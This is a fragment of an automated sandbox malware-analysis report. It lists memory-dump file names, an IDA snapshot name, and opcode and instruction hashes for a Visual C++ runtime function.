                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmp
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: Message___crt__invoke_watson
                          • String ID: ...$Microsoft Visual C++ Runtime Library
                          • API String ID: 1560407238-1400160072
                          • Opcode ID: 9079c4aea4a7d55a3d4ba95c012d5d2649afd720f8422bc88494445431a5c4fa
                          • Instruction ID: 2a786292ba2e1302313ff6bfd6ff2c13696f24582b93c1c4ab7a77e6bb9970a0
                          • Opcode Fuzzy Hash: 9079c4aea4a7d55a3d4ba95c012d5d2649afd720f8422bc88494445431a5c4fa
                          • Instruction Fuzzy Hash: 0201D411B5020122EA2126B92D2BBEF5F58FB1B714B880135FF15E9B83F9459B188096
                          Uniqueness

                          Uniqueness Score: -1.00%